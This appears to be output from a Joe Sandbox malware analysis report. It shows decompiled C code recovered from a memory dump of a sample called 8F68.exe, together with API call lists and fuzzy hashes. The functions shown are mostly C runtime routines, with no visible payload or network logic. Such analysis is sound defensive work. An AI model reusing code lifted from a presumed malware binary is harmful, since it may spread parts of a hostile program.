                                                0x00c23770
                                                0x00c23775
                                                0x00000000
                                                0x00c23775
                                                0x00c23761
                                                0x00c2372b
                                                0x00c23731
                                                0x00c23733
                                                0x00c23735
                                                0x00c2373e
                                                0x00000000
                                                0x00c23737
                                                0x00c23737
                                                0x00c2373a
                                                0x00c237b4
                                                0x00c237b4
                                                0x00c237b9
                                                0x00c237bc
                                                0x00c237bd
                                                0x00c237be
                                                0x00c237c5
                                                0x00c237c7
                                                0x00c237cc
                                                0x00c237cf
                                                0x00c237ed
                                                0x00c237f0
                                                0x00c237f5
                                                0x00c237f7
                                                0x00000000
                                                0x00c237f9
                                                0x00c23805
                                                0x00c23809
                                                0x00c2380b
                                                0x00c23830
                                                0x00c23832
                                                0x00c2384b
                                                0x00c23852
                                                0x00000000
                                                0x00c23834
                                                0x00c23834
                                                0x00c2383d
                                                0x00c23842
                                                0x00000000
                                                0x00c23842
                                                0x00c2380d
                                                0x00c2380d
                                                0x00c2380d
                                                0x00c23816
                                                0x00c2381b
                                                0x00c2381c
                                                0x00c2381c
                                                0x00000000
                                                0x00c23821
                                                0x00c2380b
                                                0x00c237d1
                                                0x00c237d7
                                                0x00c237d9
                                                0x00c237db
                                                0x00c237e8
                                                0x00000000
                                                0x00c237dd
                                                0x00c237dd
                                                0x00c237e0
                                                0x00c2385a
                                                0x00c2385a
                                                0x00c237e2
                                                0x00c237e2
                                                0x00c237e2
                                                0x00c237e2
                                                0x00c237e4
                                                0x00c237e4
                                                0x00c237e4
                                                0x00c237e0
                                                0x00c237db
                                                0x00c2385d
                                                0x00c23865
                                                0x00c23867
                                                0x00c23867
                                                0x00c2386e
                                                0x00c2373c
                                                0x00c237ac
                                                0x00c237ac
                                                0x00c237ae
                                                0x00000000
                                                0x00c237b0
                                                0x00c237b3
                                                0x00c237b3
                                                0x00c237ae
                                                0x00c2373a
                                                0x00c23735
                                                0x00c23714
                                                0x00c23719
                                                0x00c23719

                                                APIs
                                                • GetLastError.KERNEL32(?,?,?,00C1BE2E,?,?,00000000,?,00C1B9BE,?,?,?), ref: 00C23668
                                                • _free.LIBCMT ref: 00C236C5
                                                • _free.LIBCMT ref: 00C236FB
                                                • SetLastError.KERNEL32(00000000,00000005,000000FF,?,00000000,?,00C1B9BE,?,?,?), ref: 00C23706
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast_free
                                                • String ID:
                                                • API String ID: 2283115069-0
                                                • Opcode ID: b38c20d164ccd8d1bc3b42e62d25c2766c9c3b13dcceeaec0d16a85945ba7f58
                                                • Instruction ID: 280e75678dfd40f38a8871f02d81ff7f9610b867c2abc9908427aaba62fa1a3c
                                                • Opcode Fuzzy Hash: b38c20d164ccd8d1bc3b42e62d25c2766c9c3b13dcceeaec0d16a85945ba7f58
                                                • Instruction Fuzzy Hash: D81106722046717ADA1126B57C8AF2F265EBBC17B47350224F32486AE1DE788E01A120
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 85%
                                                			E00C237BA(void* __ecx) {
                                                				intOrPtr _t2;
                                                				signed int _t3;
                                                				signed int _t13;
                                                				signed int _t18;
                                                				long _t21;
                                                
                                                				_t21 = GetLastError();
                                                				_t2 =  *0xc42190; // 0x5
                                                				_t24 = _t2 - 0xffffffff;
                                                				if(_t2 == 0xffffffff) {
                                                					L6:
                                                					_t3 = E00C25721(__eflags, _t2, 0xffffffff);
                                                					__eflags = _t3;
                                                					if(_t3 == 0) {
                                                						goto L3;
                                                					} else {
                                                						_t18 = E00C22F42(1, 0x364);
                                                						__eflags = _t18;
                                                						if(__eflags != 0) {
                                                							__eflags = E00C25721(__eflags,  *0xc42190, _t18);
                                                							if(__eflags != 0) {
                                                								E00C23491(_t18, 0xc99444);
                                                								E00C22F9F(0);
                                                								goto L13;
                                                							} else {
                                                								_t13 = 0;
                                                								E00C25721(__eflags,  *0xc42190, 0);
                                                								_push(_t18);
                                                								goto L9;
                                                							}
                                                						} else {
                                                							_t13 = 0;
                                                							__eflags = 0;
                                                							E00C25721(0,  *0xc42190, 0);
                                                							_push(0);
                                                							L9:
                                                							E00C22F9F();
                                                							goto L4;
                                                						}
                                                					}
                                                				} else {
                                                					_t18 = E00C256E2(_t24, _t2);
                                                					if(_t18 == 0) {
                                                						_t2 =  *0xc42190; // 0x5
                                                						goto L6;
                                                					} else {
                                                						if(_t18 != 0xffffffff) {
                                                							L13:
                                                							_t13 = _t18;
                                                						} else {
                                                							L3:
                                                							_t13 = 0;
                                                							L4:
                                                							_t18 = _t13;
                                                						}
                                                					}
                                                				}
                                                				SetLastError(_t21);
                                                				asm("sbb edi, edi");
                                                				return  ~_t18 & _t13;
                                                			}








                                                0x00c237c5
                                                0x00c237c7
                                                0x00c237cc
                                                0x00c237cf
                                                0x00c237ed
                                                0x00c237f0
                                                0x00c237f5
                                                0x00c237f7
                                                0x00000000
                                                0x00c237f9
                                                0x00c23805
                                                0x00c23809
                                                0x00c2380b
                                                0x00c23830
                                                0x00c23832
                                                0x00c2384b
                                                0x00c23852
                                                0x00000000
                                                0x00c23834
                                                0x00c23834
                                                0x00c2383d
                                                0x00c23842
                                                0x00000000
                                                0x00c23842
                                                0x00c2380d
                                                0x00c2380d
                                                0x00c2380d
                                                0x00c23816
                                                0x00c2381b
                                                0x00c2381c
                                                0x00c2381c
                                                0x00000000
                                                0x00c23821
                                                0x00c2380b
                                                0x00c237d1
                                                0x00c237d7
                                                0x00c237db
                                                0x00c237e8
                                                0x00000000
                                                0x00c237dd
                                                0x00c237e0
                                                0x00c2385a
                                                0x00c2385a
                                                0x00c237e2
                                                0x00c237e2
                                                0x00c237e2
                                                0x00c237e4
                                                0x00c237e4
                                                0x00c237e4
                                                0x00c237e0
                                                0x00c237db
                                                0x00c2385d
                                                0x00c23865
                                                0x00c2386e

                                                APIs
                                                • GetLastError.KERNEL32(?,?,?,00C1DA2D,00C1BB4B,?,?,00C1CD13,?,?,?,?,?,?,?), ref: 00C237BF
                                                • _free.LIBCMT ref: 00C2381C
                                                • _free.LIBCMT ref: 00C23852
                                                • SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,?,00C1DA2D,00C1BB4B,?,?,00C1CD13,?,?,?,?,?), ref: 00C2385D
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast_free
                                                • String ID:
                                                • API String ID: 2283115069-0
                                                • Opcode ID: 4fd8aeaf2c7e4325cc91c4a6d0595fa03b9cbd932adf7bc3d2c9d4d46193c103
                                                • Instruction ID: 86a37e7f0057ce5e0958a0fa23e12cc7a068cd7653013ca1e7de570b0c3e9a7f
                                                • Opcode Fuzzy Hash: 4fd8aeaf2c7e4325cc91c4a6d0595fa03b9cbd932adf7bc3d2c9d4d46193c103
                                                • Instruction Fuzzy Hash: E811E5723046707BDB1122B97CC6F2F265ABBC5B747350235F328869D1DE758E01B120
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 77%
                                                			E00C15A2C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                				intOrPtr* _t36;
                                                				void* _t41;
                                                				intOrPtr* _t64;
                                                				intOrPtr* _t75;
                                                				intOrPtr* _t76;
                                                				void* _t78;
                                                
                                                				_t71 = __edx;
                                                				_t58 = __ebx;
                                                				_push(8);
                                                				E00C176C7(0xc32fdc, __ebx, __edi, __esi);
                                                				E00C153B9(_t78 - 0x14, 0);
                                                				_t75 =  *0xc98c40; // 0x0
                                                				 *(_t78 - 4) =  *(_t78 - 4) & 0x00000000;
                                                				 *((intOrPtr*)(_t78 - 0x10)) = _t75;
                                                				_t36 = E00C11A60( *((intOrPtr*)(_t78 + 8)), E00C119A0(__ebx, 0xc98b5c, __edx, __edi));
                                                				_t73 = _t36;
                                                				if(_t36 != 0) {
                                                					L5:
                                                					E00C15411(_t78 - 0x14);
                                                					return E00C176A4(_t73);
                                                				} else {
                                                					if(_t75 == 0) {
                                                						_push( *((intOrPtr*)(_t78 + 8)));
                                                						_push(_t78 - 0x10);
                                                						_t41 = E00C15F5B(__ebx, _t73, _t75, __eflags);
                                                						_pop(_t64);
                                                						__eflags = _t41 - 0xffffffff;
                                                						if(__eflags == 0) {
                                                							E00C11810();
                                                							asm("int3");
                                                							_push(8);
                                                							E00C176C7(0xc3301a, __ebx, _t73, _t75);
                                                							_t76 = _t64;
                                                							 *((intOrPtr*)(_t78 - 0x14)) = _t76;
                                                							 *((intOrPtr*)(_t78 - 0x10)) = 0;
                                                							__eflags =  *((intOrPtr*)(_t78 + 0x10));
                                                							if( *((intOrPtr*)(_t78 + 0x10)) != 0) {
                                                								 *_t76 = 0xc3438c;
                                                								 *((intOrPtr*)(_t76 + 0x10)) = 0;
                                                								 *((intOrPtr*)(_t76 + 0x30)) = 0;
                                                								 *((intOrPtr*)(_t76 + 0x34)) = 0;
                                                								 *((intOrPtr*)(_t76 + 0x38)) = 0;
                                                								 *((intOrPtr*)(_t76 + 8)) = 0xc34380;
                                                								 *(_t78 - 4) = 0;
                                                								 *((intOrPtr*)(_t78 - 0x10)) = 1;
                                                							}
                                                							 *((intOrPtr*)(_t76 +  *((intOrPtr*)( *_t76 + 4)))) =  &E00C34388;
                                                							_t28 =  *((intOrPtr*)( *_t76 + 4)) - 8; // -8
                                                							 *((intOrPtr*)( *((intOrPtr*)( *_t76 + 4)) + _t76 - 4)) = _t28;
                                                							__eflags =  *((intOrPtr*)( *_t76 + 4)) + _t76;
                                                							E00C16418(_t58,  *((intOrPtr*)( *_t76 + 4)) + _t76, _t71, _t73,  *((intOrPtr*)( *_t76 + 4)) + _t76,  *((intOrPtr*)(_t78 + 8)),  *((intOrPtr*)(_t78 + 0xc)));
                                                							return E00C176A4(_t76);
                                                						} else {
                                                							_t73 =  *((intOrPtr*)(_t78 - 0x10));
                                                							 *((intOrPtr*)(_t78 - 0x10)) = _t73;
                                                							 *(_t78 - 4) = 1;
                                                							E00C156DA(__eflags, _t73);
                                                							 *0xc34138();
                                                							 *((intOrPtr*)( *((intOrPtr*)( *_t73 + 4))))();
                                                							 *0xc98c40 = _t73;
                                                							goto L5;
                                                						}
                                                					} else {
                                                						_t73 = _t75;
                                                						goto L5;
                                                					}
                                                				}
                                                			}









                                                0x00c15a2c
                                                0x00c15a2c
                                                0x00c15a2c
                                                0x00c15a33
                                                0x00c15a3d
                                                0x00c15a42
                                                0x00c15a4d
                                                0x00c15a51
                                                0x00c15a5d
                                                0x00c15a62
                                                0x00c15a66
                                                0x00c15aab
                                                0x00c15aae
                                                0x00c15aba
                                                0x00c15a68
                                                0x00c15a6a
                                                0x00c15a70
                                                0x00c15a76
                                                0x00c15a77
                                                0x00c15a7d
                                                0x00c15a7e
                                                0x00c15a81
                                                0x00c15abb
                                                0x00c15ac0
                                                0x00c15ac1
                                                0x00c15ac8
                                                0x00c15acd
                                                0x00c15acf
                                                0x00c15ad4
                                                0x00c15ad7
                                                0x00c15ada
                                                0x00c15adc
                                                0x00c15ae2
                                                0x00c15ae5
                                                0x00c15ae8
                                                0x00c15aeb
                                                0x00c15aee
                                                0x00c15af5
                                                0x00c15af8
                                                0x00c15af8
                                                0x00c15b0a
                                                0x00c15b16
                                                0x00c15b19
                                                0x00c15b22
                                                0x00c15b24
                                                0x00c15b30
                                                0x00c15a83
                                                0x00c15a83
                                                0x00c15a86
                                                0x00c15a8a
                                                0x00c15a8e
                                                0x00c15a9b
                                                0x00c15aa3
                                                0x00c15aa5
                                                0x00000000
                                                0x00c15aa5
                                                0x00c15a6c
                                                0x00c15a6c
                                                0x00000000
                                                0x00c15a6c
                                                0x00c15a6a

                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00C15A3D
                                                  • Part of subcall function 00C119A0: std::_Lockit::_Lockit.LIBCPMT ref: 00C119BC
                                                  • Part of subcall function 00C119A0: std::_Lockit::~_Lockit.LIBCPMT ref: 00C119D9
                                                • codecvt.LIBCPMT ref: 00C15A77
                                                • std::_Facet_Register.LIBCPMT ref: 00C15A8E
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00C15AAE
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Registercodecvt
                                                • String ID:
                                                • API String ID: 2219260569-0
                                                • Opcode ID: eb4371165bc560fdda041cc6301c2282691244bd36837f0e8c99bfc35c700612
                                                • Instruction ID: 34f5c44adead4390d0b2935a1f5ba8189019c285face0e3ed4828464728389ba
                                                • Opcode Fuzzy Hash: eb4371165bc560fdda041cc6301c2282691244bd36837f0e8c99bfc35c700612
                                                • Instruction Fuzzy Hash: 4001C036950919CBCB04EBA4D8556FE77B1AFC6310F284509F811AB391CF749EC5BB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00C31EBC(void* _a4, long _a8, DWORD* _a12) {
                                                				void* _t13;
                                                
                                                				_t13 = WriteConsoleW( *0xc42a50, _a4, _a8, _a12, 0);
                                                				if(_t13 == 0 && GetLastError() == 6) {
                                                					E00C31EA5();
                                                					E00C31E67();
                                                					_t13 = WriteConsoleW( *0xc42a50, _a4, _a8, _a12, _t13);
                                                				}
                                                				return _t13;
                                                			}




                                                0x00c31ed9
                                                0x00c31edd
                                                0x00c31eea
                                                0x00c31eef
                                                0x00c31f0a
                                                0x00c31f0a
                                                0x00c31f10

                                                APIs
                                                • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00C3047B,00000000,00000001,00000000,00000000,?,00C26F87,?,00000000,00000000), ref: 00C31ED3
                                                • GetLastError.KERNEL32(?,00C3047B,00000000,00000001,00000000,00000000,?,00C26F87,?,00000000,00000000,?,00000000,?,00C274D3,?), ref: 00C31EDF
                                                  • Part of subcall function 00C31EA5: CloseHandle.KERNEL32(FFFFFFFE,00C31EEF,?,00C3047B,00000000,00000001,00000000,00000000,?,00C26F87,?,00000000,00000000,?,00000000), ref: 00C31EB5
                                                • ___initconout.LIBCMT ref: 00C31EEF
                                                  • Part of subcall function 00C31E67: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00C31E96,00C30468,00000000,?,00C26F87,?,00000000,00000000,?), ref: 00C31E7A
                                                • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,00C3047B,00000000,00000001,00000000,00000000,?,00C26F87,?,00000000,00000000,?), ref: 00C31F04
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                • String ID:
                                                • API String ID: 2744216297-0
                                                • Opcode ID: e33e7a9732bea31d700091d939ca541ee9339e3a5865412c85f0d6df16ebad13
                                                • Instruction ID: 162b5777525b38f2c4c46b88d9a9e2e4bfc1b0b4574c80c19497a60b31b6ca50
                                                • Opcode Fuzzy Hash: e33e7a9732bea31d700091d939ca541ee9339e3a5865412c85f0d6df16ebad13
                                                • Instruction Fuzzy Hash: ABF0C03A520114BFCF261FE5EC09B9E7F66FF0A3A1F454051FE1995130C7329960AB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00C22CCE() {
                                                
                                                				E00C22F9F( *0xc9943c);
                                                				 *0xc9943c = 0;
                                                				E00C22F9F( *0xc99440);
                                                				 *0xc99440 = 0;
                                                				E00C22F9F( *0xc993fc);
                                                				 *0xc993fc = 0;
                                                				E00C22F9F( *0xc99400);
                                                				 *0xc99400 = 0;
                                                				return 1;
                                                			}



                                                0x00c22cd7
                                                0x00c22ce4
                                                0x00c22cea
                                                0x00c22cf5
                                                0x00c22cfb
                                                0x00c22d06
                                                0x00c22d0c
                                                0x00c22d14
                                                0x00c22d1d

                                                APIs
                                                • _free.LIBCMT ref: 00C22CD7
                                                  • Part of subcall function 00C22F9F: HeapFree.KERNEL32(00000000,00000000,?,00C2BDE5,?,00000000,?,?,?,00C2C088,?,00000007,?,?,00C2C57B,?), ref: 00C22FB5
                                                  • Part of subcall function 00C22F9F: GetLastError.KERNEL32(?,?,00C2BDE5,?,00000000,?,?,?,00C2C088,?,00000007,?,?,00C2C57B,?,?), ref: 00C22FC7
                                                • _free.LIBCMT ref: 00C22CEA
                                                • _free.LIBCMT ref: 00C22CFB
                                                • _free.LIBCMT ref: 00C22D0C
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 0f5dc361285734595dbae804d110f8038ec6a8899deb952ba066b363e70e6a9e
                                                • Instruction ID: 225f434fe5f1f9d5455948e04f46e7ce390ce0072df56499c251434d527c57c4
                                                • Opcode Fuzzy Hash: 0f5dc361285734595dbae804d110f8038ec6a8899deb952ba066b363e70e6a9e
                                                • Instruction Fuzzy Hash: 0FE09271844230AA8B13AF69BD4AB4D3BA1FB44704342420FF81416A39DB320523FF81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __startOneArgErrorHandling.LIBCMT ref: 00C1FF6D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorHandling__start
                                                • String ID: pow
                                                • API String ID: 3213639722-2276729525
                                                • Opcode ID: a526f8703110f2916d5f081821c2c2944559b4dba919e39f5c222e491da846f3
                                                • Instruction ID: 34488bcbc71646908b25afd417a845b9e766304f762613fc942a33ecdd32a306
                                                • Opcode Fuzzy Hash: a526f8703110f2916d5f081821c2c2944559b4dba919e39f5c222e491da846f3
                                                • Instruction Fuzzy Hash: EE518E71A1820286DB12B754E9513FD27E0EB42700F248E7DF0E542AE5DF758EC7AA46
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E00C2080F(void* __edx, intOrPtr _a4) {
                                                				signed int _v8;
                                                				void* _v12;
                                                				char _v16;
                                                				char* _v20;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				char* _t26;
                                                				intOrPtr* _t36;
                                                				signed int _t37;
                                                				signed int _t40;
                                                				char _t42;
                                                				signed int _t43;
                                                				intOrPtr* _t44;
                                                				intOrPtr* _t45;
                                                				intOrPtr _t48;
                                                				signed int _t49;
                                                				signed int _t54;
                                                				void* _t57;
                                                				intOrPtr* _t58;
                                                				signed int _t64;
                                                				signed int _t66;
                                                
                                                				_t57 = __edx;
                                                				_t48 = _a4;
                                                				if(_t48 != 0) {
                                                					__eflags = _t48 - 2;
                                                					if(_t48 == 2) {
                                                						L5:
                                                						E00C2ACDA(_t48);
                                                						E00C2A721(_t48, _t57, 0, 0xc992d0, 0, 0xc992d0, 0x104);
                                                						_t26 =  *0xc99404; // 0x1663350
                                                						 *0xc993f4 = 0xc992d0;
                                                						_v20 = _t26;
                                                						__eflags = _t26;
                                                						if(_t26 == 0) {
                                                							L7:
                                                							_t26 = 0xc992d0;
                                                							_v20 = 0xc992d0;
                                                							L8:
                                                							_v8 = 0;
                                                							_v16 = 0;
                                                							_t64 = E00C20AB9(E00C20945( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
                                                							__eflags = _t64;
                                                							if(__eflags != 0) {
                                                								E00C20945( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
                                                								__eflags = _t48 - 1;
                                                								if(_t48 != 1) {
                                                									_v12 = 0;
                                                									_push( &_v12);
                                                									_t49 = E00C2A64F(_t64, _t64);
                                                									__eflags = _t49;
                                                									if(_t49 == 0) {
                                                										_t58 = _v12;
                                                										_t54 = 0;
                                                										_t36 = _t58;
                                                										__eflags =  *_t58;
                                                										if( *_t58 == 0) {
                                                											L17:
                                                											_t37 = 0;
                                                											 *0xc993f8 = _t54;
                                                											_v12 = 0;
                                                											_t49 = 0;
                                                											 *0xc993fc = _t58;
                                                											L18:
                                                											E00C22F9F(_t37);
                                                											_v12 = 0;
                                                											L19:
                                                											E00C22F9F(_t64);
                                                											_t40 = _t49;
                                                											L20:
                                                											return _t40;
                                                										} else {
                                                											goto L16;
                                                										}
                                                										do {
                                                											L16:
                                                											_t36 = _t36 + 4;
                                                											_t54 = _t54 + 1;
                                                											__eflags =  *_t36;
                                                										} while ( *_t36 != 0);
                                                										goto L17;
                                                									}
                                                									_t37 = _v12;
                                                									goto L18;
                                                								}
                                                								_t42 = _v8 - 1;
                                                								__eflags = _t42;
                                                								 *0xc993f8 = _t42;
                                                								_t43 = _t64;
                                                								_t64 = 0;
                                                								 *0xc993fc = _t43;
                                                								L12:
                                                								_t49 = 0;
                                                								goto L19;
                                                							}
                                                							_t44 = E00C1DA28(__eflags);
                                                							_push(0xc);
                                                							_pop(0);
                                                							 *_t44 = 0;
                                                							goto L12;
                                                						}
                                                						__eflags =  *_t26;
                                                						if( *_t26 != 0) {
                                                							goto L8;
                                                						}
                                                						goto L7;
                                                					}
                                                					__eflags = _t48 - 1;
                                                					if(__eflags == 0) {
                                                						goto L5;
                                                					}
                                                					_t45 = E00C1DA28(__eflags);
                                                					_t66 = 0x16;
                                                					 *_t45 = _t66;
                                                					E00C1D94E();
                                                					_t40 = _t66;
                                                					goto L20;
                                                				}
                                                				return 0;
                                                			}

























                                                0x00c2080f
                                                0x00c20818
                                                0x00c2081d
                                                0x00c20827
                                                0x00c2082a
                                                0x00c20847
                                                0x00c20848
                                                0x00c2085b
                                                0x00c20860
                                                0x00c20868
                                                0x00c2086e
                                                0x00c20871
                                                0x00c20873
                                                0x00c2087a
                                                0x00c2087a
                                                0x00c2087c
                                                0x00c2087f
                                                0x00c20882
                                                0x00c20889
                                                0x00c208a2
                                                0x00c208a7
                                                0x00c208a9
                                                0x00c208ca
                                                0x00c208d2
                                                0x00c208d5
                                                0x00c208f0
                                                0x00c208f3
                                                0x00c208fa
                                                0x00c208fe
                                                0x00c20900
                                                0x00c20907
                                                0x00c2090a
                                                0x00c2090c
                                                0x00c2090e
                                                0x00c20910
                                                0x00c2091a
                                                0x00c2091a
                                                0x00c2091c
                                                0x00c20922
                                                0x00c20925
                                                0x00c20927
                                                0x00c2092d
                                                0x00c2092e
                                                0x00c20934
                                                0x00c20937
                                                0x00c20938
                                                0x00c2093e
                                                0x00c20941
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c20912
                                                0x00c20912
                                                0x00c20912
                                                0x00c20915
                                                0x00c20916
                                                0x00c20916
                                                0x00000000
                                                0x00c20912
                                                0x00c20902
                                                0x00000000
                                                0x00c20902
                                                0x00c208da
                                                0x00c208da
                                                0x00c208db
                                                0x00c208e0
                                                0x00c208e2
                                                0x00c208e4
                                                0x00c208e9
                                                0x00c208e9
                                                0x00000000
                                                0x00c208e9
                                                0x00c208ab
                                                0x00c208b0
                                                0x00c208b2
                                                0x00c208b3
                                                0x00000000
                                                0x00c208b3
                                                0x00c20875
                                                0x00c20878
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c20878
                                                0x00c2082c
                                                0x00c2082f
                                                0x00000000
                                                0x00000000
                                                0x00c20831
                                                0x00c20838
                                                0x00c20839
                                                0x00c2083b
                                                0x00c20840
                                                0x00000000
                                                0x00c20840
                                                0x00000000

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: C:\Users\user\AppData\Local\Temp\8F68.exe
                                                • API String ID: 0-3450837374
                                                • Opcode ID: 49c675150a30634a57cd49c4609202d68240526557c3fc5b1c7bce48b582cab7
